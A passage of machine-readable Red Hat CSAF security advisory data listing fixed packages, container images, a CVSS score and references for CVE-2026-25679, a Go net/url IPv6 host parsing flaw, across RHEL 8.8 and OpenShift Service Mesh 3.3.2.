"product_version", "name": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "product": {"name": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "product_id": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.2-1.el8_8.2?arch=x86_64&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "product": {"name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "product_id": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.2-1.el8_8.2?arch=x86_64&epoch=1"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.2-1.el8_8.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.ppc64le"}, "product_reference": "rhc-1:0.2.2-1.el8_8.2.ppc64le", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.2-1.el8_8.2.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.src"}, "product_reference": "rhc-1:0.2.2-1.el8_8.2.src", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le"}, "product_reference": "rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le"}, "product_reference": "rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.2-1.el8_8.2.src as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product_id": "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.src"}, "product_reference": "rhc-1:0.2.2-1.el8_8.2.src", "relates_to_product_reference": "AppStream-8.8.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product_id": "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product_id": "AppStream-8.8.0.Z.TUS:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.TUS"}, {"category": "default_component_of", "full_product_name": {"name": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product_id": "AppStream-8.8.0.Z.TUS:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"}, "product_reference": "rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "relates_to_product_reference": "AppStream-8.8.0.Z.TUS"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T11:44:28+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9695"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.E4S:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "AppStream-8.8.0.Z.E4S:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.src", "AppStream-8.8.0.Z.TUS:rhc-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debuginfo-1:0.2.2-1.el8_8.2.x86_64", "AppStream-8.8.0.Z.TUS:rhc-debugsource-1:0.2.2-1.el8_8.2.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9695"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "Red Hat OpenShift Service Mesh 3.3.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Red Hat OpenShift Service Mesh 3.3.2, which is based on the open source Istio project, addresses a variety of problems in a microservice architecture by creating a centralized point of control in an application.\n\nFixes/Improvements:\n\nSecurity Fix(es):\n\n* istio-rhel9-operator: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\n* istio-cni-rhel9: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\n* istio-pilot-rhel9: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\n* istio-proxyv2-rhel9: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nBug Fix(es):\n\n* Ztunnel default value in operator contains older istio version (OSSM-13103)\n\n* OSSM operator metrics reader ClusterRole conflicts with other operators (OSSM-13106)", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9461", "url": "https://access.redhat.com/errata/RHSA-2026:9461"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2026-25679", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "https://access.redhat.com/security/cve/cve-2026-25679", "url": "https://access.redhat.com/security/cve/cve-2026-25679"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification", "url": "https://access.redhat.com/security/updates/classification"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/", "url": "https://access.redhat.com/security/updates/classification/"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9461.json"}], "title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh 3.3.2", "tracking": {"current_release_date": "2026-06-08T15:52:51+00:00", "generator": {"date": "2026-06-08T15:52:51+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9461", "initial_release_date": "2026-04-21T17:38:07+00:00", "revision_history": [{"date": "2026-04-21T17:38:07+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-21T17:38:20+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:51+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat OpenShift Service Mesh 3.3", "product": {"name": "Red Hat OpenShift Service Mesh 3.3", "product_id": "Red Hat OpenShift Service Mesh 3.3", "product_identification_helper": {"cpe": "cpe:/a:redhat:service_mesh:3.3::el9"}}}], "category": "product_family", "name": "Red Hat OpenShift Service Mesh"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-sail-operator-bundle@sha256%3A7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776442424"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-cni-rhel9@sha256%3A96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233000"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-must-gather-rhel9@sha256%3A2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776141540"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-rhel9-operator@sha256%3A31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776419718"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-pilot-rhel9@sha256%3Ab563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233016"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-proxyv2-rhel9@sha256%3Aa56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776293296"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "product_identification_helper": {"purl": "pkg:oci/istio-ztunnel-rhel9@sha256%3A58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776232457"}}}], "category": "architecture", "name": "amd64"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-cni-rhel9@sha256%3Af420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233000"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-must-gather-rhel9@sha256%3A5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776141540"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-rhel9-operator@sha256%3Ade3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776419718"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-pilot-rhel9@sha256%3A0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233016"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-proxyv2-rhel9@sha256%3A7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776293296"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64", "product_id": "registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64", "product_identification_helper": {"purl": "pkg:oci/istio-ztunnel-rhel9@sha256%3A8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776232457"}}}], "category": "architecture", "name": "arm64"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-cni-rhel9@sha256%3A4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233000"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-must-gather-rhel9@sha256%3Ad3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776141540"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-rhel9-operator@sha256%3A3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776419718"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "product": {"name": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "product_id": "registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "product_identification_helper": {"purl": "pkg:oci/istio-pilot-rhel9@sha256%3Acbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh&tag=1776233016"}}}, {"category": "product_version", "name": "registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "product": {"name": 